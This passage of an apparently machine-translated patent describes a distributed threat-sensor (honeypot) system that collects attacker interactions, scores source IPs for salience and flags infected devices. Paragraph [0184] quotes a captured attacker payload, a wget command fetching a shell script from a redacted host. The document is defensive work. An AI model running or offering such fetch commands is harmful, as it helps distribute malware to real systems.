[0183] In some embodiments, for interactions between a suspected object and an external malware distribution point, the threat intelligence system can retrieve malware samples and store them in data storage 1404 for further static and dynamic analysis. Depending on the embodiment, this can be performed by a threat data collector, threat sensor, threat sensor deployment and management component, or distributed threat sensor data aggregation and export component that handles the interactions. Retrieved files are retrieved and analyzed recursively for further outbound referencing. In some embodiments, this recursive retrieval mechanism may only apply to files that match heuristics, for detecting script files (non-binary) with matching heuristic header content and referencing context.

[0184] exist Figure 14In the example shown, the threat data collector first receives an interaction from the source address “sxx.xxx.xxx.45” on target port 8081 in box 1402. The payload of the interaction contains the command: “wget+http: / / xxxx.xxx.xxx.38 / netg.sh”. Threat intelligence systems, such as threat sensors, can simulate controlled interactions with this external malware distribution point, as shown in Table 1406. For example, the threat data collector might initiate an outbound interaction to “http: / / xxxx.xxx.xxx.38 / netg.sh”, as shown in 1406. This interaction might receive content instructing the initiator to initiate other outbound links to different locations. For example, the threat data collector might initiate these other links. These other links might receive different “Executable and Linkable Format (ELF) binaries”, which can then be stored in data storage area 1404 for further analysis.

[0185] In addition to storing these referenced files, the threat intelligence system also treats its distribution points as virtual outbound interactions with threat data collectors. When a referenced file is uploaded to data storage 1404, each interaction record can contain the following metadata about the outbound link: content_hash, content_len, content_type, inbound_addr, inbound_port, outbound_url, header_len, and header_hash. Suspicious outbound links provide a powerful means of determining the salience score of suspicious IP addresses, especially in the context of their associated inbound interactions with the threat data collectors of threat sensors. Even without any new interactions with the threat data collectors of threat sensors, the captured metadata about outbound links can be used as a fingerprint to determine whether the suspicious IP address continues to be used maliciously.

[0186] IoT devices

[0187] Figure 15 This is a block diagram of an edge device, such as an IoT device, according to some embodiments, which may be a known device matched with a potentially malicious device. In the depicted embodiment, edge device 1540 includes a processor 1500, memory 1502, battery 1504, and network interface 1506. Memory 1502 includes a local data collector 1542. Edge device 1540 may be... Figure 4 One of the known IoT devices is 468.

[0188] In some embodiments, memory 1502 contains executable instructions, and processor 1500 executes these instructions to implement local data collector 1542. In one embodiment, network interface 1506 communicatively couples edge device 1540 to a local network. Therefore, edge device 1540 transmits data to the local network via network interface 1506, and potentially to an edge device monitor. In another embodiment, network interface 1506 may transmit data via a wired or wireless interface.

[0189] In some embodiments, the edge device and one or more of its components (e.g., processors and memory) may be relatively lightweight and small compared to the components (e.g., processors and memory) provided to the provider network for implementing model training services. For example, the size of one or more memory units and / or one or more processor units provided to one or more servers of the provider network for implementing malware infection detection services may be at least an order of magnitude larger than the size of the memory units and / or processor units used by the edge device.

[0190] In some embodiments, the threat intelligence system 100 and / or the distributed threat sensor analysis and related components 402 can operate within the context of reinforcement learning processes used to train / modify their internal finders, determiners, confidence levels, machine learning heuristics, or models. For example, the provider network 102 may obtain topology data from the local network at multiple points in time (e.g., periodically) and, based on the topology data, periodically modify or replace its internal finders, determiners, confidence levels, machine learning heuristics, or models to improve accuracy, increase the confidence level of results (e.g., predictions), and / or improve the performance of the local network.

[0191] In embodiments, the reinforcement learning process is used to obtain the lowest confidence level for a prediction while minimizing one or more costs associated with obtaining the prediction. For example, costs incurred by edge devices due to network traffic / latency and / or power consumption can be minimized while still achieving the lowest level of accuracy. In embodiments, the confidence level and / or accuracy level can be measured as a percentage (e.g., 99% or 90.5%) or any other value suitable for quantifying the confidence level or accuracy level, ranging from no confidence or accuracy (e.g., 0%) to full confidence or accuracy (e.g., 100%).

[0192] In some embodiments, Figure 1-14Any system, service, component, or sensor in the provider network described herein can operate within the context of an event-driven execution environment. For example, one or more functions can be assigned to corresponding events, such that a specific function is triggered when the event-driven execution environment detects an event assigned to that function (e.g., receiving data from one or more specific edge devices). In embodiments, the function may include one or more operations that process the received data and can generate a result (e.g., a prediction).

[0193] Explanatory System

[0194] Figure 16 The block diagrams, based on some embodiments, illustrate example computer systems that can be used for threat intelligence services and / or threat sensor and / or threat sensor deployment and management components and / or distributed threat sensor data aggregation and data export components and / or distributed threat sensor analysis and related components. In at least some embodiments, a computer implementing some or all of the methods and apparatuses described herein for threat intelligence services and / or threat sensor and / or threat sensor deployment and management components and / or distributed threat sensor data aggregation and data export components and / or distributed threat sensor analysis and related components may comprise a general-purpose computer system or computing device that includes or is configured to access one or more computer-accessible media, such as... Figure 16 The computer system shown is 1600. Figure 16 This is a block diagram illustrating an example computer system that may be used in some embodiments. For example, this computer system may be used as a threat intelligence service 100 and / or threat sensors (140, 160) and / or threat sensor deployment and management component 202 and / or distributed threat sensor data aggregation and data export component 302 and / or distributed threat sensor analysis and correlation component 402, or it may be used as a backend resource host for performing one or more of the backend resource instances, or one or more of the multiple computing instances (630, 650) in computing service 610a, or driving one or more of the multiple server instances 620 in computing service 610b. In the illustrated embodiment, computer system 1600 includes one or more processors 1610 coupled to system memory 1620 via input / output (I / O) interface 1630. Computer system 1600 further includes a network interface 1640 coupled to I / O interface 1630.

[0195] In various embodiments, computer system 1600 may be a single-processor system including one processor 1610, or a multiprocessor system including several processors 1610 (e.g., two, four, eight, or another suitable number). Processor 1610 may be any suitable processor capable of executing instructions. For example, in various embodiments, processor 1610 may be a general-purpose or embedded processor implementing any of a variety of instruction set architectures (ISAs), such as x86, PowerPC, SPARC, or MIP ISA, or any other suitable ISA. In a multiprocessor system, each processor 1610 may typically, but not necessarily, implement the same ISA.

[0196] System memory 1620 may be configured to store instructions and data accessible by processor 1610. In various embodiments, system memory 1620 may be implemented using any suitable memory technology, such as static random access memory (SRAM), synchronous dynamic RAM (SDRAM), non-volatile / flash memory, or any other type of memory. In the illustrated embodiments, program instructions and data implementing one or more desired functions, such as those described above for the apparatus and methods for threat intelligence services and / or threat sensors and / or threat sensor deployment and management components and / or distributed threat sensor data aggregation and data export components and / or distributed threat sensor analysis and related components, are shown as code and data 1624 stored within system memory 1620 for threat intelligence services and / or threat sensors and / or threat sensor deployment and management components and / or distributed threat sensor data aggregation and data export components and / or distributed threat sensor analysis and related components.

[0197] In one embodiment, I / O interface 1630 may be configured to coordinate I / O traffic between processor 1610, system memory 1620, and all peripheral devices including network interface 1640 or other peripheral interfaces. In some embodiments, I / O interface 1630 may perform any necessary protocol, timing, or other data transformations to convert data signals from one component (e.g., system memory 1620) into a format suitable for use by another component (e.g., processor 1610). In some embodiments, I / O interface 1630 may support devices attached via various types of peripheral buses, such as the Peripheral Component Interconnect (PCI) bus standard or variants of the Universal Serial Bus (USB) standard. In some embodiments, the functionality of I / O interface 1630 may be divided into two or more independent components, such as a northbridge and a southbridge. Furthermore, in some embodiments, some or all of the functionality of I / O interface 1630, such as the interface to system memory 1620, may be directly integrated into processor 1610.

[0198] For example, network interface 1640 may be configured to allow data exchange between computer system 1600 and other devices 1660 attached to one or more networks 1670, such as... Figure 1-6 Other computer systems or devices shown. In various embodiments, for example, network interface 1640 may support communication via any suitable wired or wireless general data network, such as various types of Ethernet. Additionally, network interface 1640 may support communication via telecommunications / telephone networks, such as analog voice networks or digital fiber optic communication networks, via storage area networks, such as Fibre Channel SANs, or via any other suitable type of network and / or protocol.

[0199] In some embodiments, system memory 1620 may be an embodiment of a computer-accessible medium configured to store program instructions and data, as described above for... Figures 1 to 14 The description includes components for implementing threat intelligence services and / or threat sensors and / or threat sensor deployment and management, and / or distributed threat sensor data aggregation and data export, and / or distributed threat sensor analysis and related components. However, in other embodiments, program instructions and / or data may be received, transmitted, or stored on different types of computer-accessible media. Generally, computer-accessible media may include non-transitory storage media or memory media, such as magnetic or optical media, like a disk or DVD / CD coupled to computer system 1600 via I / O interface 1630. Non-transitory computer-accessible storage media may also include any volatile or non-volatile media, such as RAM (e.g., SDRAM, DDR SDRAM, RDRAM, SRAM, etc.), ROM, etc., which may be included as system memory 1620 or another type of memory in some embodiments of computer system 1600. Furthermore, computer-accessible media may include transmission media or signals, such as electrical, electromagnetic, or digital signals transmitted via communication media such as networks and / or wireless links, for example, implemented via network interface 1640.

[0200] Any of the various computer systems can be configured to implement processes associated with the provider network, threat intelligence system, threat sensor, threat data collector, client device, edge device, layer device, or any other component shown in the figures above. In various embodiments, Figure 1-14 The provider network, threat intelligence system, threat sensor, threat data collector, client device, edge device, layer device, or any other component of any of these may each contain one or more computer systems 1600, such as Figure 16As shown. In embodiments, a provider network, threat intelligence system, threat sensor, threat data collector, client device, edge device, layer device, or any other component may include one or more components of computer system 1600 that operate in the same or similar manner as described in the computer system 1600.

[0201] Embodiments of this disclosure may be described in accordance with the following terms:

[0202] Clause 1. A system comprising:

[0203] Multiple computing devices, physically located in multiple different geographical areas, and each having a corresponding processor and memory for executing multiple threat sensors;

[0204] One or more computers, wherein one or more processors and associated memory are configured to implement a threat sensor deployment and management service for a provider network, wherein the threat sensor deployment and management service is configured to:

[0205] Determine a deployment plan for the plurality of threat sensors, wherein each threat sensor specifies one or more of a plurality of different types of threat data collectors, wherein at least some of the different types of threat data collectors use different communication protocols or communication ports, or provide different responses to inbound communications, and wherein the deployment plan specifies different lifetimes for the threat sensors;

[0206] The multiple threat sensors are deployed at different network addresses in the multiple different geographical regions of the provider network, and configured according to the deployment plan;

[0207] Collect threat data from deployed threat sensors;

[0208] Based on the collected threat data and the varying lifetimes of the threat sensors, an adjusted deployment plan is determined, including one or more adjustments to the deployment plan; and

[0209] According to the adjusted deployment plan, the adjustments to the threat sensors are performed in one or more of the geographical regions.

[0210] Clause 2. The system pursuant to Clause 1, wherein the provider network provides multiple services, including a virtual computing instance service, and wherein the threat sensor deployment and management service uses the virtual computing instance service to deploy at least some of the multiple threat sensors.

[0211] Clause 3. The system according to Clause 2, wherein at least one specific threat sensor among the plurality of threat sensors not implemented by the virtual computing instance service is deployed outside the provider network, and wherein, in order to collect threat data from the deployed threat sensor, the threat sensor deployment and management service is further configured to:

[0212] Data is collected from at least one of the specific threat sensors deployed outside the provider's network from among the plurality of threat sensors.

[0213] Clause 4. The system pursuant to any one of Clauses 1 to 3, wherein the threat sensor deployment and management service is further configured to:

[0214] Provide an interface for clients of the provider network to specify details of the required threat sensor deployment; and

[0215] In order to determine the deployment plan for the plurality of threat sensors, the threat sensor deployment and management service is further configured to:

[0216] The deployment plan is determined based at least in part on specified details from the client.

[0217] Clause 5. A method comprising:

[0218] Perform the following through threat sensor deployment and management components:

[0219] Determine a deployment plan for multiple threat sensors, wherein each threat sensor specifies one or more of multiple different types of threat data collectors, wherein at least some of the different types of threat data collectors use different communication protocols or communication ports, or provide different responses to inbound communications, and wherein the deployment plan specifies different lifetimes for the threat sensors;

[0220] The multiple threat sensors are deployed at multiple different network addresses in multiple different geographical regions and configured according to the deployment plan;

[0221] Collect threat data from deployed threat sensors;

[0222] Based on the collected threat data and the varying lifetimes of the threat sensors, an adjusted deployment plan is determined, including one or more adjustments to the deployment plan; and

[0223] According to the adjusted deployment plan, the adjustments to the threat sensors are performed in one or more of the geographical regions.

[0224] Clause 6. The method described in Clause 5 further includes:

[0225] The threat sensor deployment and management components perform adjustment iterations at different times, wherein a specific adjustment iteration includes repeating the following operations:

[0226] The threat data is collected from the deployed threat sensors;

[0227] Determine the adjusted deployment plan; and

[0228] Perform the adjustments to the threat sensor.

[0229] Clause 7. The method according to any one of Clauses 5 or 6, wherein performing the adjustment of the threat sensor according to the adjusted deployment plan further comprises one or more of the following: terminating the threat sensor, deploying at least one new threat sensor at a new network address different from the plurality of different network addresses where the plurality of threat sensors have been deployed, or modifying the lifetime of the deployed threat sensor.

[0230] Clause 8. The method according to any one of Clauses 5 to 7 further comprises:

[0231] Information regarding inbound communications received at the corresponding threat sensor among the deployed threat sensors is recorded by the threat data collector of the corresponding threat sensor among the deployed threat sensors; and

[0232] Threat sensor logs are generated from the recording actions of the corresponding threat data collector using the corresponding threat sensor among the deployed threat sensors.

[0233] Clause 9. The method according to any one of Clauses 5 to 8 further comprises:

[0234] By using specific threat data collectors among the threat data collectors that have deployed threat sensors, inbound communications are responded to with different identification information to simulate responses from different types of systems.

[0235] Clause 10. The method according to any one of Clauses 5 to 9 further comprises:

[0236] Deploy and manage the components using the threat sensors to perform the following operations:

[0237] Determine that one or more threat sensors in a specific geographic area are receiving more inbound communications than a threshold; and

[0238] Based at least in part on the determination, additional threat sensors are deployed at network addresses in the specific geographic region.

[0239] Clause 11. The method according to any one of Clauses 5 to 10, further comprising:

[0240] Deploy and manage the components using the threat sensors to perform the following operations:

[0241] Determining that a specific threat sensor among the deployed multiple threat sensors is receiving an inbound communication number exceeding a threshold; and

[0242] Based at least in part on the determination, the lifetime of the specific threat sensor is extended.

[0243] Clause 12. The method according to any one of Clauses 5 to 11, wherein at least two of the different threat data collectors among the deployed threat sensors communicate on the same port using different communication protocols, the method further comprising:

[0244] Perform the following operations using the deployed threat sensors:

[0245] Determine the inbound communication protocol; and

[0246] The threat data collector is selected from the at least two threat data collectors that communicate using the determined inbound communication protocol to process the inbound communication.

[0247] Clause 13. The method according to any one of Clauses 5 to 12, wherein at least two of the different threat data collectors among the deployed threat sensors communicate on the same port using different communication protocols, the method further comprising:

[0248] Perform the following operations using the deployed threat sensors:

[0249] Receive inbound communication; and

[0250] In response to the inbound communication, one of at least two of the different threat data collectors is selected, wherein the selection is a weighted random selection, and weights are assigned to each of the different threat data collectors.

[0251] Clause 14. The method according to any one of Clauses 5 to 13, further comprising:

[0252] Perform the following operations using a specific threat data collector among the deployed threat sensors:

[0253] Analyze inbound communications, wherein the inbound communications include requests to initiate communications to a network address;

[0254] Determine that the network address exists in the inbound communication; and

[0255] Data is downloaded from the network address present in the inbound communications in order to determine information that can be used for threat intelligence.

[0256] Clause 15. The method according to any one of Clauses 5 to 14, wherein the different network addresses of the plurality of threat sensors deployed are not disclosed.

[0257] Clause 16. A non-transitory computer-readable storage medium containing one or more stored program instructions that, when executed on or across one or more processors of a threat sensor deployment and management component, cause the one or more processors to:

[0258] Determine a deployment plan for multiple threat sensors, wherein each threat sensor specifies one or more of multiple different types of threat data collectors, wherein at least some of the different types of threat data collectors use different communication protocols or communication ports, or provide different responses to inbound communications, and wherein the deployment plan specifies different lifetimes for the threat sensors;

[0259] The multiple threat sensors are deployed at multiple different network addresses in multiple different geographical regions and configured according to the deployment plan;

[0260] Collect threat data from deployed threat sensors;

[0261] Based on the collected threat data and the varying lifetimes of the threat sensors, an adjusted deployment plan is determined, including one or more adjustments to the deployment plan; and

[0262] According to the adjusted deployment plan, the adjustments to the threat sensors are performed in one or more of the geographical regions.

[0263] Clause 17. One or more non-transitory computer-readable storage media as described in Clause 16, wherein the program instructions further cause the one or more processors of the threat sensor deployment and management component to:

[0264] Adjustment iterations are performed at different times, where a particular adjustment iteration involves repeating the following operations:

[0265] The threat data is collected from the deployed threat sensors;

[0266] Determine the adjusted deployment plan; and

[0267] Perform the adjustments to the threat sensor.

[0268] Clause 18. One or more non-transitory computer-readable storage media pursuant to any one of Clauses 16 or 17, wherein, in order to perform the adjustments to the threat sensor in accordance with the adjusted deployment plan, the program instructions further cause the one or more processors of the threat sensor deployment and management component to perform one or more of the following:

[0269] Terminating threat sensors;

[0270] Deploy at least one new threat sensor at a new network address that is different from the multiple different network addresses where the multiple threat sensors have already been deployed; or

[0271] Modify the lifetime of the deployed threat sensors.

[0272] Clause 19. One or more non-transitory computer-readable storage media pursuant to any one of Clauses 16 to 18, wherein the program instructions further cause the threat sensor to deploy and manage the one or more processors:

[0273] Determine if a specific deployed threat sensor has received a threshold number of inbound communications from a single source; and

[0274] Prevent the multiple different threat data collectors of the specific deployed threat sensor from responding to other inbound communications from the single source.

[0275] Clause 20. One or more non-transitory computer-readable storage media pursuant to any one of Clauses 16 to 19, wherein the program instructions further cause the one or more processors of the threat sensor deployment and management component to:

[0276] To identify specific threat sensors among multiple deployed threat sensors that are compromised by malware; and

[0277] The specific threat sensor is terminated, at least in part, based on the determination.

[0278] Embodiments of this disclosure may also be described in accordance with the following terms:

[0279] Clause 21. A system comprising:

[0280] Multiple computing devices, including respective processors and memories, are used to execute multiple threat sensors that detect interactions with sources of interaction, wherein the multiple threat sensors are deployed at corresponding multiple different network addresses and are physically located in different geographical areas within a provider network;

[0281] One or more processors and associated memory, configured to implement a distributed threat sensor data aggregation and data export service of the provider network, wherein the distributed threat sensor data aggregation and data export service is configured to:

[0282] Sensor log streams are received from the plurality of threat sensors deployed in the provider network, wherein each log in the sensor log stream includes information about a corresponding interaction with the corresponding threat sensor, and wherein the information includes a corresponding identifier of the source of the interaction;

[0283] Based on the identifier of the source of the interaction, the information about the interaction with the threat sensor is aggregated from the sensor log stream received from the plurality of threat sensors within a defined time period into aggregated information about the interaction for each of the respective sources of the interaction;

[0284] Based at least in part on the aggregated information about the interaction, a corresponding salience score is calculated for each of the respective sources of the interaction, wherein each corresponding salience score includes the probability that the respective source is involved in threat network communication; and

[0285] For at least some of the respective sources of the interaction, at least some of the corresponding salience scores are provided to one or more targets.

[0286] Clause 22. The system of Clause 21, wherein the provider network provides multiple services, including a data streaming service, and wherein the sensor log stream from the multiple threat sensors is received from the data streaming service of the provider network.

[0287] Clause 23. The system according to any one of Clauses 21 or 22, wherein at least one specific threat sensor of the plurality of threat sensors is deployed outside the provider network, and wherein, in order to receive the sensor log stream from the plurality of threat sensors, the distributed threat sensor data aggregation and data export service is further configured to:

[0288] Sensor logs are received from at least one of the specific threat sensors deployed outside the provider's network from among the plurality of threat sensors.

[0289] Clause 24. The system according to any one of Clauses 21 to 23, wherein, in order to calculate the saliency score of the respective saliency score of the individual source of the interaction among the respective respective sources of the interaction, the distributed threat sensor data aggregation and data export service is further configured to:

[0290] Recentness information regarding the recentity of the interaction is determined, at least in part based on the aggregated information about the interaction from the single source within the defined time period, and the aggregated information about the interaction from the single source within a previous defined time period.

[0291] Determine the number of the plurality of threat sensors communicating with the single source during at least one period within the defined time period; and

[0292] The salience score of the interacting single source is calculated, at least in part, based on the determined proximity information and the determined number of threat sensors communicating with the single source.

[0293] Clause 25. A method comprising:

[0294] Perform the following operations using the distributed threat sensor data aggregation and data export component:

[0295] Sensor log streams are received from multiple threat sensors, wherein each log in the sensor log stream includes information about a corresponding interaction with the corresponding threat sensor, and wherein the information includes a corresponding identifier of the source of the interaction;

[0296] Based on the identifier of the source of the interaction, the information about the interaction with the threat sensor is aggregated from the sensor log stream received from the plurality of threat sensors within a defined time period into aggregated information about the interaction for each of the respective sources of the interaction within the defined time period;

[0297] Based at least in part on the aggregated information about the interaction, a corresponding salience score is calculated for each of the respective sources of the interaction, wherein each corresponding salience score includes the probability that the respective source is involved in threat network communication; and

[0298] For at least some of the respective sources of the interaction, at least some of the corresponding salience scores are provided to one or more targets.

[0299] Clause 26. The method according to Clause 25, wherein calculating the saliency score of the respective saliency score of the individual source of the interaction in the respective respective sources of the interaction comprises:

[0300] Recentness information regarding the recentity of the interaction is determined, at least in part based on the aggregated information about the interaction from the single source within the defined time period and the aggregated information about the interaction from the single source within a previous defined time period.

[0301] Determine the number of the plurality of threat sensors communicating with the single source during at least one period within the defined time period;

[0302] The salience score of the interacting single source is calculated, at least in part, based on the determined proximity information and the determined number of threat sensors communicating with the single source.

[0303] Clause 27. The method according to any one of Clauses 25 or 26, wherein calculating the saliency score of the respective saliency score of the individual sources of the interaction comprises:

[0304] The saliency score is calculated at least in part based on one or more of the following: the determined classification of the payload received from the single source of the interaction, the determined number of different ports interacting with the single source of the interaction, the determined number of threat sensors interacting with the single source of the interaction, the determined number of outbound initiating connections associated with the single source of the interaction, or the determined static or dynamic nature of the network address associated with the single source of the interaction.

[0305] Clause 28. The method according to any one of Clauses 25 to 27, wherein the information regarding the corresponding interaction with the corresponding threat sensor further includes one or more of the following: the target port of the interaction, the payload classification of the interaction, the protocol used for the interaction, the one or more threat sensors that detected the interaction, and information regarding whether the interaction is an inbound connection initiated, an outbound connection initiated, or both inbound and outbound connections initiated simultaneously.

[0306] Clause 29. The method described pursuant to Clause 28 further includes:

[0307] The following operations are performed using the distributed threat sensor data collection and data export component:

[0308] The received sensor log stream is stored in a database, including information about the corresponding interaction with the corresponding threat sensor, wherein the database provides a query interface for analyzing the information in the received sensor log stream about the corresponding interaction with the corresponding threat sensor.

[0309] Clause 30. The method according to any one of Clauses 25 to 29, wherein the identifier of the source of the interaction includes an IP address associated with the source of the interaction, and wherein the aggregated information about the interaction of the respective respective sources of the interaction includes information aggregated by IP address.

[0310] Clause 31. The method according to any one of Clauses 25 to 30, further comprising:

[0311] The following operations are performed using the distributed threat sensor data aggregation and data export component:

[0312] Receive information that associates the identifier of the source of the interaction with the geographic location or external internet service provider; and

[0313] The calculation of the corresponding saliency scores of the respective sources of the interaction is further based at least in part on the received information.

[0314] Clause 32. The method according to any one of Clauses 25 to 31 further comprises:

[0315] The following operations are performed using the distributed threat sensor data aggregation and data export component:

[0316] Obtain external threat intelligence; and

[0317] Identify a portion of at least one of the identifiers in the external threat intelligence information that corresponds to the source of the interaction;

[0318] The calculation of the respective salience scores of the respective sources of the interaction is further based, at least in part, on the external threat intelligence information of at least one of the identifiers corresponding to the sources of the interaction.

[0319] Clause 33. The method according to any one of Clauses 25 to 32, wherein calculating the corresponding salience scores of the respective sources of the interaction based at least in part on the aggregated information about the interaction further comprises:

[0320] The corresponding saliency score is calculated based at least in part on user input regarding the calculation.

[0321] Clause 34. The method according to any one of Clauses 25 to 33 further comprises:

[0322] The following operations are performed using the distributed threat sensor data aggregation and data export component:

[0323] Generate metrics about the aggregated information and the salience score for display in a user interface or dashboard.

[0324] Clause 35. A non-transitory computer-readable storage medium containing one or more stored program instructions that, when executed on or across one or more processors of a distributed threat sensor data collection and data derivation component, cause the one or more processors to:

[0325] Sensor log streams are received from multiple threat sensors, wherein each log in the sensor log stream includes information about a corresponding interaction with the corresponding threat sensor, and wherein the information includes a corresponding identifier of the source of the interaction;

[0326] Based on the identifier of the source of the interaction, the information about the interaction with the threat sensor is aggregated from the sensor log stream received from the plurality of threat sensors within a defined time period into aggregated information about the interaction for each of the respective sources of the interaction within the defined time period;

[0327] Based at least in part on the aggregated information about the interaction, a corresponding salience score is calculated for each of the respective sources of the interaction, wherein each corresponding salience score includes the probability that the respective source is involved in threat network communication; and

[0328] For at least some of the respective sources of the interaction, at least some of the corresponding salience scores are provided to one or more targets.

[0329] Clause 36. One or more non-transitory computer-readable storage media as described in Clause 35, wherein, in order to calculate a saliency score in the respective saliency scores of individual sources of the interaction, the program instructions further cause the one or more processors of the distributed threat sensor data collection and data export component to:

[0330] Recentness information regarding the recentity of the interaction is determined, at least in part based on the aggregated information about the interaction from the single source within the defined time period and the aggregated information about the interaction from the single source within a previous defined time period.

[0331] Determine the number of the plurality of threat sensors communicating with the single source during at least one period within the defined time period; and

[0332] The salience score of the interacting single source is calculated, at least in part, based on the determined proximity information and the determined number of threat sensors communicating with the single source.

[0333] Clause 37. One or more non-transitory computer-readable storage media according to any one of Clauses 35 or 36, wherein, in order to calculate a saliency score in the respective saliency scores of individual sources of the interaction, the program instructions further cause the one or more processors of the distributed threat sensor data collection and data export component to:

[0334] The saliency score is calculated at least in part based on one or more of the following: the determined classification of the payload received from the single source of the interaction, the determined number of different ports interacting with the single source of the interaction, the determined number of threat sensors interacting with the single source of the interaction, the determined number of outbound initiating connections associated with the single source of the interaction, or the determined static or dynamic nature of the network address associated with the single source of the interaction.

[0335] Clause 38. One or more non-transitory computer-readable storage media according to any one of Clauses 35 to 37, wherein the information regarding the corresponding interaction with the corresponding threat sensor further includes one or more of the following: the target port of the interaction, the payload classification of the interaction, the protocol used for the interaction, the one or more threat sensors that detected the interaction, and information regarding whether the interaction is an inbound connection initiated, an outbound connection initiated, or both inbound and outbound connections initiated simultaneously.

[0336] Clause 39. One or more non-transitory computer-readable storage media as described in Clause 38, wherein the program instructions further cause the one or more processors of the distributed threat sensor data collection and data export component to:

[0337] The received sensor log stream is stored in a database, including information about the corresponding interaction with the corresponding threat sensor, wherein the database provides a query interface for analyzing the information in the received sensor log stream about the corresponding interaction with the corresponding threat sensor.

[0338] Clause 40. One or more non-transitory computer-readable storage media pursuant to any one of Clauses 35 to 39, wherein, in order to provide at least some of the salience scores to the one or more targets for at least some of the respective sources of the interaction, the program instructions further cause the one or more processors of the distributed threat sensor data collection and data export component to:

[0339] Determine or receive the significance score threshold;

[0340] Determine the significance score that exceeds the significance score threshold; and

[0341] The determined saliency scores that exceed the saliency score threshold and the corresponding sources of the interactions associated with the determined saliency scores are provided to the one or more targets.

[0342] Embodiments of this disclosure may also be described in accordance with the following terms:

[0343] Clause 41. A system comprising:

[0344] Multiple computing devices, each including a processor and memory, are used to execute multiple threat sensors, wherein each of the multiple threat sensors detects and interacts with a source of interaction, and wherein the multiple threat sensors are deployed at corresponding multiple different network addresses and are physically located in different geographical areas within a provider network.

[0345] One or more processors and associated memory, configured to implement distributed threat sensor analysis and related services of the provider network, wherein the distributed threat sensor analysis and related services are configured to:

[0346] Obtain multiple individual identifiers for the respective sources that interact with the multiple threat sensors, and a corresponding salience score associated with each of the multiple individual identifiers;

[0347] Identifiers of malicious actors, including a subset of the multiple individual identifiers, are determined at least in part based on the salience score.

[0348] Receive identifiers of multiple known participants, wherein the multiple known participants include one or more of the following: servers in the provider network, computing instances in the provider network, client devices in the client network, or IoT devices deployed in a remote network;

[0349] Associating the identifier of a malicious actor with the identifier of a known actor to identify one or more of the known actors as infected with malware; and

[0350] Provide the identifiers of one or more of the known participants who are infected with malware to one or more targets.

[0351] Clause 42. The system according to Clause 41, wherein the provider network provides multiple services, including a database service, and wherein at least the identifier of the malicious actor or the identifier of one or more of the known actors infected with malware is stored in the database of the provider network's database service.

[0352] Clause 43. The system according to any one of Clauses 41 or 42, wherein at least one specific threat sensor of the plurality of threat sensors is deployed outside the provider network, and wherein, in order to obtain the plurality of individual identifiers of the respective sources interacting with the plurality of threat sensors, the distributed threat sensor analysis and related services are further configured to:

[0353] Obtain the plurality of individual identifiers of the respective sources that interact with at least one of the specific threat sensors deployed outside the provider network.

[0354] Clause 44. The system according to any one of Clauses 41 to 43, wherein, in order to obtain the corresponding saliency score associated with the respective respective identifiers, the distributed threat sensor analysis and related services are further configured to target a single source of the interaction among the respective sources interacting with the plurality of threat sensors:

[0355] Recentness information regarding the relevance of the interaction with the plurality of threat sensors by the single source is determined, at least in part, based on aggregated information about the interaction with the single source within a time period and aggregated information about the interaction with the single source in a previous time period.

[0356] Determine the number of the plurality of threat sensors communicating with the single source during at least one period of the time period; and

[0357] The salience score in the corresponding salience score of the interacting single source is calculated, based at least in part on the determined proximity information and the determined number of threat sensors communicating with the single source.

[0358] Clause 45. A method comprising:

[0359] Perform the following operations through distributed threat sensor analysis and related components:

[0360] Obtain multiple individual identifiers for the respective sources that interact with multiple threat sensors, and corresponding salience scores associated with each of the multiple individual identifiers;

[0361] Identifiers of malicious actors, including a subset of the multiple individual identifiers, are determined at least in part based on the salience score.

[0362] Receive identifiers of multiple known participants, wherein the multiple known participants include one or more of the following: servers in a provider network, computing instances in a provider network, client devices in a client network, or IoT devices deployed in a remote network;

[0363] Associating the identifier of a malicious actor with the identifier of a known actor to identify one or more of the known actors as infected with malware; and

[0364] Provide the identifiers of one or more of the known participants who are infected with malware to one or more targets.

[0365] Clause 46. The method according to Clause 45, wherein determining the identifier of a malicious actor further comprises:

[0366] Determine the malicious salience score, including salience scores that exceed a received or determined threshold; and

[0367] The respective identifiers associated with the malicious salience score are identified as the identifiers of the malicious actor.

[0368] Clause 47. The method according to any one of Clauses 45 or 46 further comprises:

[0369] The following operations are performed using the distributed threat sensor analysis and related components:

[0370] In response to identifying one or more of the known participants as infected with malware, a first responsive action is initiated, wherein the first responsive action includes one or more of the following: (a) triggering the execution of a client-provided function; (b) sending a message to the remote network or the client network instructing the one or more known participants; or (c) terminating the security certificates of one or more specific known participants in the provider network.

[0371] Clause 48. The method according to any one of Clauses 45 to 47 further comprises:

[0372] The following operations are performed using the distributed threat sensor analysis and related components:

[0373] Receive feedback on whether it was correct to identify one or more of the known participants as infected with malware; and

[0374] The salience score associated with each of the respective identifiers is updated, at least in part, based on the received feedback.

[0375] Clause 49. The method according to any one of Clauses 45 to 48, wherein obtaining the corresponding salience score associated with the respective respective identifier further comprises:

[0376] For a single source of an interaction among the multiple threat sensors, the distributed threat sensor analysis and related components perform the following operations:

[0377] Recentness information regarding the relevance of the interaction with the plurality of threat sensors by the single source is determined, at least in part, based on aggregated information about the interaction with the single source within a time period and aggregated information about the interaction with the single source in a previous time period.

[0378] Determine the number of the plurality of threat sensors communicating with the single source during at least one period of the time period; and

[0379] The salience score in the corresponding salience score of the interacting single source is calculated, based at least in part on the determined proximity information and the determined number of threat sensors communicating with the single source.

[0380] Clause 50. The method according to Clause 49, wherein calculating the salience score of the single source of the interaction further comprises:

[0381] The saliency score is calculated at least in part based on one or more of the following: the determined classification of the payload received from the single source of the interaction, the determined number of different ports interacting with the single source of the interaction, the determined number of threat sensors interacting with the single source of the interaction, the determined number of outbound initiating connections associated with the single source of the interaction, or the determined static or dynamic nature of the network address associated with the single source of the interaction.

[0382] Clause 51. The method according to any one of Clauses 45 to 50, wherein obtaining the corresponding salience score associated with the respective respective identifiers further comprises:

[0383] The corresponding saliency score is calculated based at least in part on user input regarding the calculation.

[0384] Clause 52. The method according to any one of Clauses 45 to 51 further comprises:

[0385] The following operations are performed using the distributed threat sensor analysis and related components:

[0386] Receive one or more of the following: the target port for the interaction with the plurality of threat sensors, the payload classification for the interaction with the plurality of threat sensors, the protocol used for the interaction with the plurality of threat sensors, one or more threat sensors that detected the interaction with the plurality of threat sensors, or information regarding whether the interaction with the plurality of threat sensors is an inbound connection initiated, an outbound connection initiated, or both inbound and outbound connections initiated; and

[0387] The identifier of the malicious actor is further determined based at least in part on one or more of the following: the target port of the interaction, the payload classification of the interaction, the protocol used by the interaction, the one or more threat sensors that detected the interaction, or information about whether the interaction is an inbound connection, an outbound connection, or both inbound and outbound connections.

[0388] Clause 53. The method according to any one of Clauses 45 to 52, further comprising:

